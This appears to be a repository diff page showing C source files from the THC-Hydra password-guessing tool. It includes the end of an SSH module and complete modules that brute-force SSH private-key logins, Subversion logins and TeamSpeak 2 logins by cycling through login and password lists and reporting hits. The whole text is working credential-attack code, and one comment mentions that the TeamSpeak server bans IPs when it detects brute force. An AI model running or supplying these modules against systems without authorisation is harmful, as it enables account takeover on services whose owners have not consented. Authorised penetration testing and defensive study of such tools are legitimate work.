ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none");
if (ssh_connect(session) != 0) {
fprintf(stderr, "[ERROR] could not connect to ssh://%s:%d\n", hydra_address2string(ip), port);
return 2;
}
rc = ssh_userauth_none(session, NULL);
method = ssh_userauth_list(session, NULL);
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
if ((method & SSH_AUTH_METHOD_INTERACTIVE) || (method & SSH_AUTH_METHOD_PASSWORD)) {
if (verbose || debug)
printf("[INFO] Successful, password authentication is supported by ssh://%s:%d\n", hydra_address2string(ip), port);
return 0;
}
fprintf(stderr, "[ERROR] target ssh://%s:%d/ does not support password authentication.\n", hydra_address2string(ip), port);
return 1;
#else
return 0;
#endif
}

166
hydra-sshkey.c Normal file
View file

@ -0,0 +1,166 @@
/*
libssh is available at http://www.libssh.org
current version is 0.4.8
If you want support for ssh v1 protocol, you
have to add option -DWITH_SSH1=On in the cmake
*/
#include "hydra-mod.h"
#ifndef LIBSSH
void dummy_sshkey() {
printf("\n");
}
#else
#include <libssh/libssh.h>
#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4
extern ssh_session session;
extern char *HYDRA_EXIT;
extern int new_session;
int start_sshkey(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *key, keep_login[300];
int auth_state = 0, rc = 0, i = 0;
ssh_private_key privkey;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(key = hydra_get_next_password()) == 0)
key = empty;
if (new_session) {
if (session) {
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
}
session = ssh_new();
ssh_options_set(session, SSH_OPTIONS_PORT, &port);
ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));
ssh_options_set(session, SSH_OPTIONS_USER, login);
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none");
if (ssh_connect(session) != 0) {
//if the connection was drop, exit and let hydra main handle it
if (verbose)
hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port);
return 3;
}
if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) {
return 3;
} else if (rc == SSH_AUTH_SUCCESS) {
hydra_report_found_host(port, ip, "sshkey", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
else
return 1;
}
} else
new_session = 1;
auth_state = ssh_auth_list(session);
if ((auth_state & SSH_AUTH_METHOD_PUBLICKEY) > 0) {
privkey = privatekey_from_file(session, key, 0, NULL);
if (!privkey) {
hydra_report(stderr, "[ERROR] skipping invalid private key: \"%s\"\n", key);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
auth_state = ssh_userauth_pubkey(session, NULL, NULL, privkey);
} else {
return 4;
}
if (auth_state == SSH_AUTH_ERROR) {
new_session = 1;
return 1;
}
if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) {
hydra_report_found_host(port, ip, "sshkey", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
} else {
strncpy(keep_login, login, sizeof(keep_login) - 1);
keep_login[sizeof(keep_login) - 1] = '\0';
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
login = hydra_get_next_login();
if (strcmp(login, keep_login) == 0)
new_session = 0;
return 1;
}
/* not reached */
return 1;
}
void service_sshkey(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_sshkey(sock, ip, port, options, miscptr, fp);
break;
case 2:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_child_exit(0);
case 3:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
fprintf(stderr, "[ERROR] ssh protocol error\n");
hydra_child_exit(2);
case 4:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
fprintf(stderr, "[ERROR] ssh target does not support pubkey auth\n");
hydra_child_exit(2);
default:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#else
#error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support"
#endif
#endif
int service_sshkey_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

206
hydra-svn.c Normal file
View file

@ -0,0 +1,206 @@
//This plugin was written by <david dot maciejak at gmail D O T com>
//checked for memleaks on 110425, none found
#ifdef LIBSVN
/* needed on openSUSE */
#define _GNU_SOURCE
#include <svn_client.h>
#include <svn_cmdline.h>
#include <svn_pools.h>
#include <svn_config.h>
#include <svn_fs.h>
#endif
#include "hydra-mod.h"
#ifndef LIBSVN
void dummy_svn() {
printf("\n");
}
#else
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
#define DEFAULT_BRANCH "trunk"
static svn_error_t *print_dirdummy(void *baton, const char *path, const svn_dirent_t * dirent, const svn_lock_t * lock, const char *abs_path, apr_pool_t * pool) {
return SVN_NO_ERROR;
}
static svn_error_t *my_simple_prompt_callback(svn_auth_cred_simple_t ** cred, void *baton, const char *realm, const char *username, svn_boolean_t may_save, apr_pool_t * pool) {
char *empty = "";
char *login, *pass;
svn_auth_cred_simple_t *ret = apr_pcalloc(pool, sizeof(*ret));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
ret->username = apr_pstrdup(pool, login);
ret->password = apr_pstrdup(pool, pass);
*cred = ret;
return SVN_NO_ERROR;
}
int start_svn(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
int ipv6 = 0;
char URL[1024];
char URLBRANCH[256];
apr_pool_t *pool;
svn_error_t *err;
svn_opt_revision_t revision;
apr_uint32_t dirents;
svn_client_ctx_t *ctx;
svn_auth_provider_object_t *provider;
apr_array_header_t *providers;
if (miscptr)
strncpy(URLBRANCH, miscptr, sizeof(URLBRANCH));
else
strncpy(URLBRANCH, DEFAULT_BRANCH, sizeof(URLBRANCH));
if (svn_cmdline_init("hydra", stderr) != EXIT_SUCCESS)
return 4;
if (ip[0] == 16)
ipv6 = 1;
pool = svn_pool_create(NULL);
err = svn_config_ensure(NULL, pool);
if (err) {
svn_handle_error2(err, stderr, FALSE, "hydra: ");
return 4;
}
if ((err = svn_client_create_context(&ctx, pool))) {
svn_handle_error2(err, stderr, FALSE, "hydra: ");
return 4;
}
if ((err = svn_config_get_config(&(ctx->config), NULL, pool))) {
svn_handle_error2(err, stderr, FALSE, "hydra: ");
return 4;
}
providers = apr_array_make(pool, 1, sizeof(svn_auth_provider_object_t *));
svn_auth_get_simple_prompt_provider(&provider, my_simple_prompt_callback, NULL, /* baton */
0, pool);
APR_ARRAY_PUSH(providers, svn_auth_provider_object_t *) = provider;
/* Register the auth-providers into the context's auth_baton. */
svn_auth_open(&ctx->auth_baton, providers, pool);
revision.kind = svn_opt_revision_head;
if (ipv6)
snprintf(URL, sizeof(URL), "svn://[%s]:%d/%s", hydra_address2string(ip), port, URLBRANCH);
else
snprintf(URL, sizeof(URL), "svn://%s:%d/%s", hydra_address2string(ip), port, URLBRANCH);
dirents = SVN_DIRENT_KIND;
err = svn_client_list2(URL, &revision, &revision, svn_depth_unknown, dirents, FALSE, print_dirdummy, NULL, ctx, pool);
svn_pool_clear(pool);
svn_pool_destroy(pool);
if (err) {
if (verbose)
hydra_report(stderr, "[ERROR] Access refused (error code %d) , message: %s\n", err->apr_err, err->message);
//Username not found 170001 ": Username not found"
//Password incorrect 170001 ": Password incorrect"
if (err->apr_err != 170001) {
return 4; //error
} else {
if (strstr(err->message, "Username not found")) {
hydra_completed_pair_skip();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
} else {
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
}
}
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] Access granted\n");
hydra_report_found_host(port, ip, "svn", fp);
hydra_completed_pair_found();
return 3;
}
return 3;
}
void service_svn(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_SVN, mysslport = PORT_SVN_SSL;
hydra_register_socket(sp);
while (1) {
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_svn(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
if (!verbose)
hydra_report(stderr, "[ERROR] Caught unknown return code, try verbose option for more details\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_svn_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

141
hydra-teamspeak.c Normal file
View file

@ -0,0 +1,141 @@
#include "hydra-mod.h"
#include "crc32.h"
/*
This module brings support for Teamspeak version 2.x (TS2 protocol)
Tested with version 2.0.r23.b19, server uses to ban ip for 10 min
when bruteforce is detected.
TS1 protocol (tcp/8765) is not supported
TS3 protocol (udp/9987) is not needed as user/pass is not used anymore
*/
struct team_speak {
char header[16];
unsigned long crc;
char clientlen;
char client[29];
char oslen;
char os[29];
char misc[10];
char userlen;
char user[29];
char passlen;
char pass[29];
char loginlen;
char login[29];
};
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
char *buf;
int start_teamspeak(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char buf[100];
struct team_speak teamspeak;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(&teamspeak, 0, sizeof(struct team_speak));
memcpy(&teamspeak.header, "\xf4\xbe\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", 16);
teamspeak.clientlen = 9;
strcpy((char *) &teamspeak.client, "TeamSpeak");
teamspeak.oslen = 11;
strcpy((char *) &teamspeak.os, "Linux 2.6.9");
memcpy(&teamspeak.misc, "\x02\x00\x00\x00\x20\x00\x3c\x00\x01\x02", 10);
teamspeak.userlen = strlen(login);
strncpy((char *) &teamspeak.user, login, 29);
teamspeak.passlen = strlen(pass);
strncpy((char *) &teamspeak.pass, pass, 29);
teamspeak.loginlen = 0;
strcpy((char *) &teamspeak.login, "");
teamspeak.crc = crc32(&teamspeak, sizeof(struct team_speak));
if (hydra_send(s, (char *) &teamspeak, sizeof(struct team_speak), 0) < 0) {
return 3;
}
if (hydra_data_ready_timed(s, 5, 0) > 0) {
hydra_recv(s, (char *) buf, sizeof(buf));
if (buf[0x58] == 1) {
hydra_report_found_host(port, ip, "teamspeak", fp);
hydra_completed_pair_found();
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_teamspeak(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_TEAMSPEAK;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
run = 3;
while (1) {
switch (run) {
case 1: /* connect and service init function */
// if (sock >= 0)
// sock = hydra_disconnect(sock);
// usleep(300000);
if (sock < 0) {
if (port != 0)
myport = port;
sock = hydra_connect_udp(ip, myport);
port = myport;
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
}
next_run = start_teamspeak(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_teamspeak_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

Some files were not shown because too many files have changed in this diff Show more